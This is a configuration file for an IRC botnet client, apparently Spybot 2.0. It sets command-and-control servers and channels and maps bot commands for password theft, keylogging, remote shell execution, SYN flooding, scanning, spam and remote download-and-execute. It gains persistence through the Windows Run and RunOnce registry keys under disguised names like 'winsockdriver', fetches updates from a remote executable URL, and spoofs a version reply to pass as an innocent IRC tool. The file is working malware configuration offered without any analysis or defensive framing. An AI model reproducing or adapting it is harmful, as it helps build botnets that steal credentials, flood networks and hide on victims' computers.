[settings]
;server port channel channelkey
1=127.0.0.1 6667 #test key
2=eu.undernet.org 6666 #bla duh
[commands]
;dont change the part before the @ !!!!!!
1=login_command@login
2=info_command@info
3=passwords_command@passwords
4=threads_command@threads
5=killthread_command@killthread
6=listprocesses_command@listprocesses
7=killprocess_command@killprocess
8=disconnect_command@disconnect
9=reconnect_command@reconnect
10=server_command@server
11=quit_command@quit
12=reboot_command@reboot
13=uninstall_command@uninstall
14=redirect_command@redirect
15=raw_command@raw
16=download_command@download
17=syn_command@syn
18=list_command@list
19=delete_command@delete
20=rename_command@rename
21=execute_command@execute
22=makedir_command@makedir
23=spy_command@spy
24=stopspy_command@stopspy
25=redirect_spy_command@redirectspy
26=redirect_stopspy_command@stopredirectspy
27=opencmd_command@opencmd
28=cmd_command@cmd
29=get_command@get
30=sendto_command@sendto
31=scan_command@scan
32=update_command@update
33=ping_command@ping
34=spam_command@spam
35=clone_command@loadclones
36=quitclones_command@killclones
37=clonesend_command@rawclones

[hostnames]
1=billgates.com

[nicknames]
1=Mich

[idents]
1=ILLuSiVe

[other]
1=runkey@SOFTWARE\Microsoft\Windows\CurrentVersion\Run
2=runoncekey@SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
3=update_url@http://myserver/autoupdate.exe
4=registerkey@SOFTWARE\Microsoft\MS. update
5=Error@err
6=OK@ok
7=PRIVMSG@PRIVMSG
8=filename@bot.exe
9=password@botpassword
10=valuename@winsockdriver
11=Bot_Version@spybot2.0
12=VERSION_REPLY@iroffer v1.2b13 [November 10th, 2001] By PMG, http://iroffer.org/ - CYGWIN_NT-5.0 1.3.10(0.51/3/2) 